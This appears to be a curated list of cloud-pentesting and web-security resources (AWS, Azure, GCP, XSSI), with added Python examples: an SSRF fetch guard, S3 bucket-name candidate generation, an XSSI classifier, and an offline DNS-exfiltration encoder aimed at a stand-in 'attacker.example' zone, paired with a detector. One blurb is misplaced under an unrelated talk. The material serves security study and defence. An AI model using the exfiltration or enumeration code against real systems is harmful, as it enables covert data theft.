- BHIS made some interesting discoveries while working with a customer to audit their Amazon Web Services (AWS) infrastructure. At the time of the discovery, we found two paths to ingress the customer’s virtual private cloud (VPC) through the elastic map reduce (EMR) application stacks. One of the vulns that gained us internal access was the Hadoop Unauthenticated RCE, which was patched by Apache a while back now. Another, and a bit more interesting entry point, was the HUE interface, which, by default, allows the creation of a new admin user for the web interface. Once in the web interface, HUE is similar to Jupyter in that it helps visualize code flow and operations. Here, you can create schedules that will send egress shells from the cluster worker nodes. Which, consequently, provides a window to a virtual private cloud network.
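Several of the writeups above reach the instance metadata service through SSRF, so here is the server-side control a practitioner wants next to them, as an added example (not code from any of the talks): a fetch guard that resolves the hostname itself and refuses any target that is not a public unicast address, including the metadata endpoints, IPv4-mapped IPv6 forms and decimal/hex literals. The resolver is injectable, and the DNS table below is constructed so the example runs offline.

```python
"""Server-side fetch guard against IMDS-style SSRF.
Added example; CONSTRUCTED_DNS and the sample URLs are made up for the demo."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Names that must never be fetched on a user's behalf, whatever they resolve to.
METADATA_HOSTS = {"169.254.169.254", "fd00:ec2::254", "metadata.google.internal", "metadata"}


def system_resolver(host):
    """getaddrinfo also normalises odd literals (2130706433, 0x7f000001, 127.1)."""
    return {ai[4][0] for ai in socket.getaddrinfo(host, None)}


def _as_address(text):
    ip = ipaddress.ip_address(text.split("%", 1)[0])     # drop any IPv6 zone id
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped                                 # ::ffff:169.254.169.254 -> IPv4
    return ip


def is_safe_fetch_target(url, resolver=system_resolver):
    """True only for http(s) URLs whose host resolves exclusively to public addresses."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme not in ALLOWED_SCHEMES or not host or host in METADATA_HOSTS:
        return False
    try:
        addresses = {_as_address(host)}            # literal address in the URL
    except ValueError:
        try:
            addresses = {_as_address(a) for a in resolver(host)}
        except (socket.gaierror, ValueError):
            return False                           # unresolvable: fail closed
    # Every answer must be public; one private or link-local record is enough to reject.
    return all(ip.is_global and not ip.is_multicast for ip in addresses)


# Constructed DNS answers so the demo never touches the network.
CONSTRUCTED_DNS = {
    "api.partner.example": {"93.184.216.34"},
    "rebind.attacker.example": {"93.184.216.34", "169.254.169.254"},   # mixed answers
    "2130706433": {"127.0.0.1"},       # what getaddrinfo returns for a decimal IPv4
}


def constructed_resolver(host):
    if host not in CONSTRUCTED_DNS:
        raise socket.gaierror(f"constructed table has no entry for {host}")
    return CONSTRUCTED_DNS[host]


def demo():
    urls = [
        "https://api.partner.example/v1/report",
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://[fd00:ec2::254]/latest/meta-data/",
        "http://[::ffff:169.254.169.254]/latest/meta-data/",
        "http://2130706433/",
        "http://rebind.attacker.example/",
        "http://metadata.google.internal/computeMetadata/v1/",
        "file:///etc/passwd",
        "gopher://api.partner.example/",
    ]
    return {u: is_safe_fetch_target(u, constructed_resolver) for u in urls}


if __name__ == "__main__":
    for url, verdict in demo().items():
        print("allow" if verdict else "block", url)
```

The guard only holds if the fetch itself honours it: disable redirects (or re-run the check on every hop) and connect to the address that was validated rather than resolving again, otherwise a short-TTL DNS rebinding slips through. On EC2, requiring IMDSv2 (the PUT-obtained token and the default hop limit of 1) removes the credential payoff even when a GET-only SSRF remains.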
- General
- An Introduction to Penetration Testing AWS: Same Same, but Different - GracefulSecurity
- Using DNS to Break Out of Isolated Networks in an AWS Cloud Environment
- Customers can utilize AWS' DNS infrastructure in VPCs (enabled by default). Traffic destined to the AmazonProvidedDNS is traffic bound for AWS management infrastructure and does not egress via the same network links as standard customer traffic and is not evaluated by Security Groups. Using DNS exfiltration, it is possible to exfiltrate data out of an isolated network.
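What "DNS exfiltration" concretely looks like on the wire, as an added example (not code from the article): the data is base32-encoded and split into query names under a zone whose authoritative server the attacker runs, with a sequence label so the query log can be reassembled in any order; a detection heuristic for the resolver side is included. Nothing is sent; the secret and zone are constructed.

```python
"""DNS exfiltration encoder/decoder plus a resolver-log heuristic.
Added example; SAMPLE_SECRET and the zone name are constructed, nothing is transmitted."""
import base64
import math
from collections import Counter

MAX_LABEL = 63      # RFC 1035 label limit
MAX_NAME = 253      # practical limit for a presentation-format name

SAMPLE_SECRET = b"instance=i-0a1b2c3d4e5f;role=deploy;session=CONSTRUCTED-SAMPLE-TOKEN"


def dns_exfil_names(data, zone, piece_len=60):
    """Encode data as base32 (case-insensitive, so DNS case folding is harmless) and
    split it into '<seq>.<piece>.<zone>' query names within the DNS length limits."""
    text = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    names = []
    for seq, start in enumerate(range(0, len(text), piece_len)):
        piece = text[start:start + piece_len]
        name = f"{seq}.{piece}.{zone}"
        if len(piece) > MAX_LABEL or len(name) > MAX_NAME:
            raise ValueError("piece_len too large for this zone")
        names.append(name)
    return names


def dns_exfil_decode(names, zone):
    """Reassemble from the authoritative server's query log, in any order, ignoring
    queries for other names."""
    pieces = {}
    for name in names:
        parts = name.lower().split(".", 2)
        if len(parts) != 3 or parts[2] != zone.lower():
            continue
        try:
            pieces[int(parts[0])] = parts[1]
        except ValueError:
            continue
    text = "".join(pieces[i] for i in sorted(pieces)).upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def label_entropy(label):
    """Shannon entropy in bits per character: encoded payload labels score high,
    human-chosen hostnames score low."""
    if not label:
        return 0.0
    counts = Counter(label)
    return -sum(c / len(label) * math.log2(c / len(label)) for c in counts.values())


def looks_like_exfil(qname, min_len=40, min_entropy=3.0):
    """Constructed heuristic for one resolver log line: a long, high-entropy label."""
    return any(len(l) >= min_len and label_entropy(l) >= min_entropy
               for l in qname.split("."))


if __name__ == "__main__":
    for n in dns_exfil_names(SAMPLE_SECRET, "exfil.attacker.example"):
        print(n, "suspicious" if looks_like_exfil(n) else "")
```

Real tooling adds a per-query nonce so intermediate resolvers cannot serve a cached answer, and uses TXT answers for the return channel. On the defensive side, the point of the article stands: these queries never cross a Security Group, so the VPC's own resolver (Route 53 Resolver query logging and DNS Firewall) is where they have to be seen, and the length/entropy heuristic above is a starting filter for that log.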
- IAM
- Lambda
- Mapping
- Cartography
- Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
- S3
- Articles/Blogposts/Writeups
- Tools
- bucket-stream
- This tool simply listens to various certificate transparency logs (via certstream) and attempts to find public S3 buckets from permutations of the certificates domain name.
- AWSBucketDump
- Security Tool to Look For Interesting Files in S3 Buckets
- buckethead.py
- buckethead.py searches across every AWS region for a variety of bucket names based on a domain name, subdomains, affixes given and more. Currently the tool will only present to you whether or not the bucket exists or if they're listable. If the bucket is listable, then further interrogation of the resource can be done. It does not attempt download or upload permissions currently but could be added as a module in the future. You will need the awscli to run this tool as this is a python wrapper around this tool.
- slurp
- Enumerate S3 buckets via certstream, domain, or keywords
- Bucketlist
- Bucketlist is a quick project I threw together to find and crawl Amazon S3 buckets and put all the data into a PostgreSQL database for querying.
- Slurp
- Blackbox/whitebox S3 bucket enumerator
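All of the enumerators above start from the same step, turning a domain and some keywords into plausible bucket names, and waste requests on names S3 could never have accepted. An added example of that step (not code from any of the tools), with the naming rules applied as a filter; checking each candidate against S3 is left to the caller, so this runs offline.

```python
"""Candidate S3 bucket names from a domain and keywords, filtered by S3 naming rules.
Added example; the domain and keywords in the demo are constructed."""
import ipaddress
import re

DEFAULT_AFFIXES = ("backup", "backups", "dev", "staging", "prod", "assets", "static",
                   "logs", "uploads", "media", "data", "archive")
_SHAPE = re.compile(r"^[a-z0-9][a-z0-9.-]{1,61}[a-z0-9]$")


def is_valid_bucket_name(name):
    """S3 rules: 3-63 chars of a-z 0-9 . -, starts/ends alphanumeric, no '..',
    not IPv4-shaped, no 'xn--' prefix, no '-s3alias' suffix."""
    if not _SHAPE.match(name) or ".." in name:
        return False
    try:
        ipaddress.IPv4Address(name)
        return False
    except ValueError:
        pass
    return not (name.startswith("xn--") or name.endswith("-s3alias"))


def _slug(text):
    """Lower-case and collapse anything S3 would reject into a single hyphen."""
    return re.sub(r"[^a-z0-9.-]+", "-", text.lower()).strip(".-")


def bucket_candidates(domain, keywords=(), affixes=DEFAULT_AFFIXES):
    """Deterministic, de-duplicated list of valid candidate names:
    the domain, the domain without its TLD, its first label, each keyword,
    and every base combined with every affix as prefix and suffix."""
    labels = _slug(domain).split(".")
    bases = {".".join(labels), ".".join(labels[:-1]), labels[0]}
    bases |= {_slug(k) for k in keywords}
    out, seen = [], set()

    def add(name):
        if name not in seen and is_valid_bucket_name(name):
            seen.add(name)
            out.append(name)

    for base in sorted(b for b in bases if b):
        add(base)
        for affix in affixes:
            for sep in ("-", ".", ""):
                add(f"{base}{sep}{affix}")
                add(f"{affix}{sep}{base}")
    return out


if __name__ == "__main__":
    for candidate in bucket_candidates("example.com", keywords=["Acme Corp"]):
        print(candidate)
```

Dotted names are worth keeping even though they break virtual-hosted HTTPS for the owner: they are exactly what teams create when they front a bucket with their own hostname. Existence and listability still have to be tested per name, and a 403 on a dotted name in a non-default region is a common false negative.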
- Securing
- CIS Amazon Web Services Foundations
- asecure.cloud
- A free repository of customizable AWS security configurations and best practices
- AWS Security Primer
- CloudMapper
- CloudMapper generates network diagrams of Amazon Web Services (AWS) environments and displays them via your browser. It helps you understand visually what exists in your accounts and identify possible network misconfigurations.
- CloudTracker
- CloudTracker helps you find over-privileged IAM users and roles by comparing CloudTrail logs with current IAM policies.
- Blogpost
- Amazon Inspector
- Amazon Inspector is an automated security assessment service that helps improve the security and compliance of applications deployed on AWS. Amazon Inspector automatically assesses applications for vulnerabilities or deviations from best practices. After performing an assessment, Amazon Inspector produces a detailed list of security findings prioritized by level of severity. These findings can be reviewed directly or as part of detailed assessment reports which are available via the Amazon Inspector console or API.
- repokid
- AWS Least Privilege for Distributed, High-Velocity Deployment
- Tools
- Scout2
- Scout2 is a security tool that lets AWS administrators assess their environment's security posture. Using the AWS API, Scout2 gathers configuration data for manual inspection and highlights high-risk areas automatically. Rather than poring through dozens of pages on the web, Scout2 supplies a clear view of the attack surface automatically.
- aws_pwn
- This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute. Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.
- Nimbostratus
- Tools for fingerprinting and exploiting Amazon cloud infrastructures
- cloudfrunt
- A tool for identifying misconfigured CloudFront domains
- cred_scanner
- A simple command line tool for finding AWS credentials in files. Optimized for use with Jenkins and other CI systems.
- Training
- AWS Security Workshops
- Here you'll find a collection of security workshops and other hands-on content that will guide you through prepared scenarios that represent common use cases and security operational tasks on Amazon Web Services (AWS). The workshops closely align with the NIST Cyber Security Framework and will provide a deep dive into a variety of AWS security services, techniques, and best practices that you'll be able to apply to your own environments to better improve your security posture.
- Serverless Security Workshop
- In this workshop, you will learn techniques to secure a serverless application built with AWS Lambda, Amazon API Gateway and RDS Aurora.
- 101
- Documentation
- Articles/Writeups
- Presentations/Talks/Videos
- Tools
- Azurite - Azurite Explorer and Azurite Visualizer
- Azurite consists of two helper scripts: Azurite Explorer and Azurite Visualizer. The scripts are used to passively collect verbose information on the main components within a deployment, to be reviewed offline, and to visualise the association between the resources using an interactive representation. One of the main features of the visual representation is to provide a quick way to identify insecure Network Security Groups (NSGs) in a subnet or Virtual Machine configuration.
- 101
- Articles/Blogposts/Writeups
- Tools
- CloudFlair
- CloudFlair is a tool to find origin servers of websites protected by CloudFlare that are publicly exposed and don't restrict network access to the CloudFlare IP ranges as they should. The tool uses Internet-wide scan data from Censys to find exposed IPv4 hosts presenting an SSL certificate associated with the target's domain name.
- CloudFire
- This project focuses on discovering potential IPs leaking from behind cloud-proxied services, e.g. Cloudflare. Although there are many ways to tackle this task, we are focusing right now on CrimeFlare database lookups, search engine scraping and other enumeration techniques.
- Articles/Writeups
- Presentations/Talks/Videos
- Tools
- Attacking
- Introducing G-Scout
- G-Scout is a tool to help assess the security of Google Cloud Platform (GCP) environment configurations. By leveraging the Google Cloud API, G-Scout automatically gathers a variety of configuration data and analyzes this data to determine security risks. It produces HTML output.
- Google Cloud Platform Security Tool
- Securing
- Google Cloud Security Scanner
- Cloud Security Scanner is a web security scanner for common vulnerabilities in Google App Engine applications. It can automatically scan and detect four common vulnerabilities, including cross-site-scripting (XSS), Flash injection, mixed content (HTTP in HTTPS), and outdated/insecure libraries. It enables early identification and delivers very low false positive rates. You can easily setup, run, schedule, and manage security scans and it is free for Google Cloud Platform users.
- Hayat
- Google Cloud Platform Auditing & Hardening Script
- Attacking
- Analyzing a Creative Attack Chain Used To Compromise A Web Application
- RCE in Hubspot with EL injection in HubL - betterhacker.com
- "This is the story of how I was able to get remote code execution on Hubspot's servers by exploiting a vulnerability in HubL expression language, which is used for creating templates and custom modules within the Hubspot CRM."
- Tools
- Boucan: A Bug Bounty Canary Platform
- This project is an attempt to implement a lightweight burp collaborator-esc application and consists of two main components: a DNS Server (Custom Python Implemention with dnslib) and an API. It is still very much in the early days of development. You can think of Boucan as sort of a Canary that will notify you when an external asset (DNS Record, HTTP Server, SMTP Server) has been interacted with. This is useful for blind payload injection.
- Keyhacks
- Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
- Building a 1-Day Exploit for Google Chrome - Brian Pak, Andrew Wesie
- 101
- A/B/W
- https://d1.awsstatic.com/whitepapers/Security/AWS_Security_Whitepaper.pdf
- https://d1.awsstatic.com/whitepapers/Storage/AWS%20Storage%20Services%20Whitepaper-v9.pdf
- Breaking and abusing specifications and policies - Frans Rosén(SecurityFest 2018)
- Last year at Secfest, Frans Rosén talked about DNS hijacking using cloud services. This time, he approaches technologies where verification methods actually exists and how to break them. Let’s Encrypt closed down one of their three blessed verification methods due to a bug Frans found in January. Cloud storage containers already patched from being publicly exposed are still often vulnerable to full modification, extraction and deletion by abusing weak policies and application logic. Frans goes through some weak design patterns, policy structures and explains how to bypass them which have netted him over $45,000 in bug bounties.
- Turtles All The Way Down: Storing Secrets in the Cloud and in the Data Center - Daniel Somerfield
- This document defines an interface definition language, Web IDL, that can be used to describe interfaces that are intended to be implemented in web browsers. Web IDL is an IDL variant with a number of features that allow the behavior of common script objects in the web platform to be specified more readily. How interfaces described with Web IDL correspond to constructs within ECMAScript execution environments is also detailed in this document. It is expected that this document acts as a guide to implementors of already-published specifications, and that newly published specifications reference this document to ensure conforming implementations of interfaces are interoperable.
- The Big List of Naughty Strings is an evolving list of strings which have a high probability of causing issues when used as user-input data. This is intended for use in helping both automated and manual QA testing; useful for whenever your QA engineer walks into a bar.
- Fuzzing JSON Web Services: Simple guide how to fuzz JSON web services properly - secapps
- XSSI and JSONP leaks
- Add links to SSL/TLS RFCs
- Homograph attacks
- XSSI
- The Tale of a Fameless but Widespread Web Vulnerability Class - Veit Hailperin
- Two key components account for finding vulnerabilities of a certain class: awareness of the vulnerability and ease of finding the vulnerability. Cross-Site Script Inclusion (XSSI) vulnerabilities are not mentioned in the de facto standard for public attention - the OWASP Top 10. Additionally there is no public tool available to facilitate finding XSSI. The impact reaches from leaking personal information stored, circumvention of token-based protection to complete compromise of accounts. XSSI vulnerabilities are fairly widespread and the lack of detection increases the risk of each XSSI. In this talk we are going to demonstrate how to find XSSI, exploit XSSI and also how to protect against XSSI.
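The triage step the talk describes ("how to find XSSI") boils down to asking, for each authenticated response, what happens when another origin loads it with a script tag. An added example of that triage (the heuristics and the sample responses are constructed here, not taken from the talk): it separates JSONP and dynamic-script responses, which hand their data to the including page, from plain JSON, and recognises the anti-XSSI prefixes that make a body unusable as a script.

```python
"""Classify one HTTP response as a cross-origin <script src> target.
Added example; SAMPLE_RESPONSES are constructed."""
import json
import re

ANTI_XSSI_PREFIXES = (")]}',", ")]}'", "for(;;);", "while(1);", "throw 1;")
_JSONP = re.compile(r"^(?:/\*\*/)?([A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*)\s*\(")
_ASSIGN = re.compile(r"^(?:var|let|const)\s+[A-Za-z_$][\w$]*\s*=|^(?:window|self)\.[A-Za-z_$][\w$]*\s*=")


def classify_xssi(body, headers):
    """Return (risk, reason) for a response body loaded cross-origin as a script."""
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    nosniff = "nosniff" in h.get("x-content-type-options", "").lower()
    text = body.strip()

    if text.startswith(ANTI_XSSI_PREFIXES):
        return ("none", "anti-XSSI prefix: body is a syntax error or an infinite loop as a script")
    m = _JSONP.match(text)
    if m and text.endswith((")", ");")):
        return ("high", f"JSONP: response data is handed to the caller-chosen function {m.group(1)}")
    if _ASSIGN.match(text):
        return ("high", "dynamic script: data is assigned to a global the including page can read")
    try:
        json.loads(text)
    except ValueError:
        return ("unknown", "neither JSON nor an obvious script: inspect by hand")
    if ctype == "application/json" and nosniff:
        return ("low", "plain JSON, correct type and nosniff: Chromium CORB/ORB keeps the body away from the cross-origin page")
    return ("medium", "plain JSON without nosniff/correct type: only legacy-engine tricks apply, but nothing stops the load")


# Constructed responses standing in for proxy history entries.
SAMPLE_RESPONSES = {
    "jsonp": ('/**/cb123({"user":"alice","balance":4200})',
              {"Content-Type": "application/javascript"}),
    "dynamic": ('var currentUser = {"email":"alice@example.com"};',
                {"Content-Type": "text/javascript"}),
    "prefixed": (")]}',\n{\"user\":\"alice\"}",
                 {"Content-Type": "application/json"}),
    "json_nosniff": ('{"user":"alice"}',
                     {"Content-Type": "application/json; charset=utf-8",
                      "X-Content-Type-Options": "nosniff"}),
    "json_loose": ('[{"user":"alice"}]',
                   {"Content-Type": "text/html"}),
}


def demo():
    """Map each sample response name to its risk level."""
    return {name: classify_xssi(body, hdrs)[0] for name, (body, hdrs) in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    for name, (body, hdrs) in SAMPLE_RESPONSES.items():
        print(name, *classify_xssi(body, hdrs))
```

Only responses that vary with the victim's cookies matter, so run this over proxy history captured while logged in and compare against the same requests made unauthenticated. The "low" verdict leans on browser-side blocking; the durable fixes are the prefix, SameSite cookies, or moving the data behind a POST or token-checked endpoint.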
- 0d1n is a tool for automating customized attacks against web applications.